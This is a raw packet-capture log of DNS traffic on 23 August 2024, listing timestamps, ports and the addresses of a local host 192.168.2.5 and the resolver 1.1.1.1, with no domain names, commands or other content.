Aug 23, 2024 18:43:31.690345049 CEST	51622	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.690520048 CEST	49485	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.690836906 CEST	56828	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.691298962 CEST	56187	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.691337109 CEST	56268	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.691889048 CEST	53	58539	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.692030907 CEST	52810	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.692415953 CEST	52849	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.692589998 CEST	51712	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.692909002 CEST	53	51400	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.694312096 CEST	53832	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.695337057 CEST	62012	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.695367098 CEST	59689	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.695540905 CEST	57462	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.695682049 CEST	49876	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.695776939 CEST	53	53636	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.695817947 CEST	59948	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.696069956 CEST	56714	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.696324110 CEST	56570	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.696417093 CEST	65452	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.696490049 CEST	57948	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.696755886 CEST	49340	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.696877003 CEST	64624	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.697053909 CEST	53	59077	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.697063923 CEST	53	58562	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.697077036 CEST	63626	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.697370052 CEST	62660	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.697479010 CEST	54824	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.697679043 CEST	52992	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.697767973 CEST	65433	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.697911024 CEST	53	65030	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.697920084 CEST	53	59853	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.697928905 CEST	53	57300	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.698046923 CEST	53	60262	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.698056936 CEST	53	52717	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.698301077 CEST	49272	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.698355913 CEST	53	55245	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.698410988 CEST	63176	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.698457956 CEST	53	63408	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.698630095 CEST	62783	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.698630095 CEST	59471	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.698678017 CEST	53	60842	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.698725939 CEST	53	58673	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.698736906 CEST	53	58493	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.698828936 CEST	53	49838	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.699058056 CEST	55733	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.699450970 CEST	53845	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.699603081 CEST	63148	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.699703932 CEST	56555	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.699858904 CEST	54769	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.700340033 CEST	63236	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.700459003 CEST	64124	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.700601101 CEST	65017	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.700740099 CEST	60962	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.701957941 CEST	53	56187	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.702029943 CEST	53	60855	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.702347994 CEST	53	51622	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.702763081 CEST	53	49485	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.702877045 CEST	53	56828	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.702886105 CEST	53	52849	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.702955008 CEST	53	51712	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.703085899 CEST	53	56268	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.703557968 CEST	53	52810	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.706216097 CEST	53	59948	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.706386089 CEST	53	59689	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.706484079 CEST	53	49876	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.707518101 CEST	53	53832	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.707535028 CEST	53	56570	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.707587957 CEST	53	49340	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.707598925 CEST	53	56714	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.707664967 CEST	53	62660	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.707673073 CEST	53	57948	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.707799911 CEST	53	63626	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.708007097 CEST	53	65433	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.708015919 CEST	53	64624	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.708277941 CEST	53	57462	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.709132910 CEST	53	49272	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.709218979 CEST	53	52992	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.709557056 CEST	53	62783	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.709595919 CEST	53	63176	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.709805012 CEST	53	55733	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.709860086 CEST	53	56555	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.709980965 CEST	53	63148	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.712393045 CEST	53	60962	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.714776039 CEST	53	52770	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.715490103 CEST	53	61512	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.718683958 CEST	53	57857	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.719013929 CEST	53	59852	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.719063997 CEST	53	54824	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.719904900 CEST	53	55846	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.721517086 CEST	53	49186	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.721560001 CEST	53	53888	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.722762108 CEST	53	55638	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.726099014 CEST	53	54225	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.728883982 CEST	53	65452	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.729214907 CEST	53	59471	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.731545925 CEST	53	62012	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.731558084 CEST	53	53845	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.732021093 CEST	53	65017	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.732850075 CEST	53	63236	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.733400106 CEST	53	64124	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.736141920 CEST	53	54769	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.737185001 CEST	59508	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.737660885 CEST	55877	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.738310099 CEST	50005	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.738792896 CEST	64027	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.739624977 CEST	52476	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.739706039 CEST	52406	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.740171909 CEST	58993	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.740550995 CEST	64252	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.740788937 CEST	56927	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.741283894 CEST	65325	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.741383076 CEST	50608	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.741780996 CEST	61443	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.741795063 CEST	60569	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.742338896 CEST	65005	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.742463112 CEST	49397	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.742809057 CEST	54109	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.743287086 CEST	52690	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.743443012 CEST	58086	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.743890047 CEST	63331	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.744118929 CEST	59554	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.744333982 CEST	55615	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.744853973 CEST	52015	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.744986057 CEST	59961	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.745281935 CEST	53934	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.745364904 CEST	61980	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.745768070 CEST	55242	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.745929003 CEST	59917	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.746356010 CEST	58629	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.746689081 CEST	51687	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.747015953 CEST	63126	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.747072935 CEST	60757	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.747711897 CEST	51610	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.747754097 CEST	51523	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.748317003 CEST	64900	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.748437881 CEST	49904	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.748948097 CEST	63340	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.749381065 CEST	50555	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.749428988 CEST	51973	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.749449968 CEST	53	59508	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.750056028 CEST	53	55877	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.750080109 CEST	54013	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.752306938 CEST	59058	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.752332926 CEST	49946	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.752474070 CEST	52409	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.752587080 CEST	52616	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.752593994 CEST	53	52406	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.752692938 CEST	60708	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.752701044 CEST	53	64027	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.752824068 CEST	62152	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.752971888 CEST	53765	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.753060102 CEST	57734	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.753226042 CEST	52469	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.753349066 CEST	53108	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.753489017 CEST	57935	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.753622055 CEST	49822	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.753699064 CEST	49884	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.753859997 CEST	55632	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.753870964 CEST	52826	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.754095078 CEST	64894	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.754154921 CEST	60972	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.754288912 CEST	60601	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.754451036 CEST	53672	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.754467010 CEST	51570	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.754676104 CEST	54436	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.754793882 CEST	53	64252	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.754823923 CEST	53	65325	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.754829884 CEST	50186	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.755072117 CEST	55895	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.755150080 CEST	53	61443	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.755230904 CEST	54239	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.755290985 CEST	49479	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.755409002 CEST	53	49397	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.755425930 CEST	53	65005	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.756213903 CEST	53	63331	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.756551981 CEST	53	52690	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.757188082 CEST	53	59554	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.758364916 CEST	53	55615	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.758373976 CEST	53	52015	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.758865118 CEST	53	58086	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.760756016 CEST	53	59917	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.760864019 CEST	53	55242	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.760879993 CEST	53	51687	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.762274027 CEST	53	51523	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.762326002 CEST	53	49904	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.762868881 CEST	53	50555	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.763446093 CEST	53	60757	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.763598919 CEST	53	54013	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.763608932 CEST	53	63126	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.763622999 CEST	53	51610	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.764719963 CEST	53	51973	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.764738083 CEST	53	49946	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.765317917 CEST	53	52616	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.765449047 CEST	53	53765	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.765465021 CEST	53	52409	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.765475988 CEST	53	62152	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.765818119 CEST	53	64894	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.766220093 CEST	53	53108	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.766277075 CEST	53	54436	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.766288996 CEST	53	52469	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.766366959 CEST	53	51570	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.767154932 CEST	53	60972	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.767311096 CEST	53	60601	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.767321110 CEST	53	55632	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.767563105 CEST	53	52826	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.768162012 CEST	53	49479	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.768189907 CEST	53	54239	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.770441055 CEST	53	50005	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.770452976 CEST	53	63340	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.774959087 CEST	53	56927	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.774990082 CEST	53	60569	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.775001049 CEST	53	52476	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.775085926 CEST	53	50608	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.778767109 CEST	53	54109	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.779624939 CEST	53	58629	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.781040907 CEST	53	64900	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.783874035 CEST	53	59058	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.785628080 CEST	53	60708	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.787131071 CEST	53	49884	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.787174940 CEST	53	57935	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.787223101 CEST	53	49822	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.787231922 CEST	53	53672	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.788044930 CEST	53	50186	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.907998085 CEST	53	53934	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.908010960 CEST	53	59961	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.910789967 CEST	53	58993	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.911484003 CEST	53	61980	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.931238890 CEST	53	57734	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.933526039 CEST	53	55895	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.934847116 CEST	53987	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.935561895 CEST	60091	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.936101913 CEST	57167	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.936780930 CEST	52791	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.937267065 CEST	56344	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.937382936 CEST	61514	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.937863111 CEST	56574	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.938318014 CEST	62091	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.938318014 CEST	51955	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.938827991 CEST	50433	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.938864946 CEST	50284	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.939306974 CEST	62505	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.939640045 CEST	49525	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.939865112 CEST	53079	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.940121889 CEST	62033	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.940556049 CEST	62827	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.940820932 CEST	65402	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.940946102 CEST	58179	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.941260099 CEST	51761	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.941639900 CEST	53410	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.941673994 CEST	61671	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.942081928 CEST	53705	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.942392111 CEST	61872	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.942679882 CEST	61412	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.942679882 CEST	59057	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.943223000 CEST	52293	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.943245888 CEST	50163	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.943645000 CEST	59111	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.943645000 CEST	65388	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.944205046 CEST	61022	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.944380045 CEST	61777	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.944380045 CEST	62282	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.945054054 CEST	50337	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.945117950 CEST	53353	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.945554018 CEST	55644	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.945854902 CEST	56053	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.946079016 CEST	49255	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.946535110 CEST	60364	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.946667910 CEST	58551	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.947077036 CEST	51192	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.947423935 CEST	55622	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.947674036 CEST	56618	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.947848082 CEST	63220	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.948338032 CEST	52599	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.948550940 CEST	57422	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.948905945 CEST	54899	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.949296951 CEST	58680	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.949628115 CEST	63943	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.949661016 CEST	61316	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.949737072 CEST	53	61514	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.949748993 CEST	53	52791	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.949759007 CEST	53	62091	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.949872017 CEST	53	50284	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.949882030 CEST	53	56574	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.949891090 CEST	53	50433	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.949901104 CEST	53	58179	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.949908972 CEST	53	62505	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.950139046 CEST	62330	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.950505972 CEST	53	49525	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.950725079 CEST	53	62033	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.951402903 CEST	53	51955	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.951411009 CEST	53	65402	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.951442957 CEST	56282	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.952374935 CEST	53	53410	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.952728987 CEST	49806	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.952804089 CEST	54781	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.952894926 CEST	62836	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.953203917 CEST	55577	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.953308105 CEST	52602	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.953432083 CEST	59634	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.953502893 CEST	50242	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.953653097 CEST	65479	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.953802109 CEST	55670	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.953830004 CEST	61025	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.953963995 CEST	54585	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.954020977 CEST	52598	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.954183102 CEST	50476	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.955374956 CEST	53	53705	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.955384016 CEST	53	51761	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.955394983 CEST	53	59057	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.955430984 CEST	53	50163	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.955480099 CEST	53	59111	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.955488920 CEST	53	52293	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.955497026 CEST	53	61872	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.955507040 CEST	53	61777	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.955583096 CEST	53	62282	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.955929041 CEST	53	50337	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.956048965 CEST	53	55644	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.956659079 CEST	53	58551	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.956717968 CEST	53	53353	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.957580090 CEST	53	61022	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.958503962 CEST	53	51192	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.958707094 CEST	53	49255	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.958925962 CEST	53	60364	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.960402966 CEST	53	63220	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.960585117 CEST	53	61025	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.960982084 CEST	53	58680	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.961478949 CEST	53	62330	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.961715937 CEST	53	52599	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.962903023 CEST	53	63943	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.962918997 CEST	53	56282	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.963120937 CEST	53	54899	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.963481903 CEST	53	65479	1.1.1.1	192.168.2.5
